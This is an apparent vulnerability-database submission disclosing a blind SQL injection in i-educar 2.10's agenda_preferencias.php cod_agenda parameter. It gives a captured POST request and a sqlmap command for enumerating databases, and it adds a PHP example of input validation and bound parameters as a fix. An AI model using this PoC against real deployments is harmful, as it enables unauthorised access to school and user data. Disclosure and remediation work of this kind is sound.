Submission #636577: Portabilis i-educar 2.10 SQL Injection

Title: Portabilis i-educar 2.10 SQL Injection
Description:

# SQL Injection (Blind Time-Based) Vulnerability in cod_agenda Parameter on agenda_preferencias.php Endpoint

---

## Summary

A SQL Injection vulnerability was identified in the `agenda_preferencias.php` endpoint of the _i-educar_ application, specifically in the `cod_agenda` parameter. This vulnerability allows attackers to execute arbitrary SQL commands on the backend database, potentially compromising the confidentiality, integrity, and availability of application data.

---

## Details

**Vulnerable Endpoint:** `/agenda_preferencias.php`
**Parameter:** `cod_agenda`

The application fails to properly validate and sanitize user input in the `cod_agenda` parameter. As a result, attackers can inject crafted SQL payloads that are executed directly by the database. This could allow database enumeration, data exfiltration, modification, or denial of service via time-based delays.

---

## PoC

Save the request in req.txt file:

```
POST /intranet/agenda_preferencias.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/intranet/agenda_preferencias.php
Cookie: [COOKIE]
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i

tipoacao=Editar&cod_agenda=2&envia_alerta=0&agenda_display=2
```

Then use sqlmap:

`sqlmap -r req.txt --risk=3 --level=5 --dbs --dbms=PostgreSQL --batch`

## Impact

- **Unauthorized data access:** Retrieving sensitive information such as credentials, personal data, or configuration details
- **Database enumeration:** Extracting schema names, tables, and column structures
- **Data manipulation:** Inserting, updating, or deleting database records
- **Denial of Service (DoS):** Using time-based injections to disrupt application availability
- **Potential privilege escalation or RCE:** Depending on the database configuration and functions available

This vulnerability can lead to full compromise of the database and expose sensitive application and user data.
Source: ⚠️ https://github.com/marcelomulder/CVE/blob/main/i-educar/SQL%20Injection%20(Blind%20Time-Based)%20Vulnerability%20in%20cod_agenda%20Parameter%20on%20agenda_preferencias.php%20Endpoint.md
User: marceloQz (UID 87549)
Submission: 2025-08-17 11:11 PM (8 months ago)
Moderation: 2025-08-28 05:28 PM (11 days later)
Status: Accepted
VulDB entry: 321784 [Portabilis i-Educar up to 2.10 agenda_preferencias.php cod_agenda SQL injection]
Points: 20
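
The Details section of the description attributes the flaw to unvalidated input in `cod_agenda`. The following is an added example, not i-educar's code and not part of the submission: strict numeric validation plus bound parameters for the fields seen in the PoC request, in PHP 8 with PDO. The table `agenda_pref`, its columns and the function names are hypothetical.

```php
<?php
declare(strict_types=1);

// Added example. Field names come from the PoC request body; the table and
// column names used in the UPDATE are hypothetical placeholders.

/** Return the value as int only if it is a plain decimal within range, else null. */
function strictId(mixed $raw, int $max = 2147483647): ?int
{
    // \A...\z anchors the whole string, so trailing text or newlines are rejected.
    if (!is_string($raw) || !preg_match('/\A[0-9]{1,10}\z/', $raw)) {
        return null;
    }
    $n = (int) $raw; // at most 10 digits, safe on 64-bit PHP
    return $n <= $max ? $n : null;
}

/** Validate the posted fields and update using bound parameters only. */
function saveAgendaPreferences(PDO $db, array $post): bool
{
    $codAgenda = strictId($post['cod_agenda'] ?? null);
    $alerta    = strictId($post['envia_alerta'] ?? null, 1);
    $display   = strictId($post['agenda_display'] ?? null);
    if ($codAgenda === null || $alerta === null || $display === null) {
        return false; // reject before any SQL is built
    }
    // Values never enter the SQL text; the driver sends them as typed parameters.
    $stmt = $db->prepare(
        'UPDATE agenda_pref
            SET envia_alerta = :alerta, agenda_display = :display
          WHERE cod_agenda = :cod_agenda'
    );
    $stmt->bindValue(':alerta', $alerta, PDO::PARAM_INT);
    $stmt->bindValue(':display', $display, PDO::PARAM_INT);
    $stmt->bindValue(':cod_agenda', $codAgenda, PDO::PARAM_INT);
    return $stmt->execute();
}

// Constructed inputs: the PoC's benign value and malformed variants.
foreach (['2', '2 abc', "2\n", '', '99999999999', ['2']] as $sample) {
    echo json_encode($sample), ' => ',
        strictId($sample) === null ? 'rejected' : 'accepted', PHP_EOL;
}
```

Validation and parameter binding are both applied here: the binding keeps the value out of the SQL text, while the validation rejects malformed requests early enough to log them.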
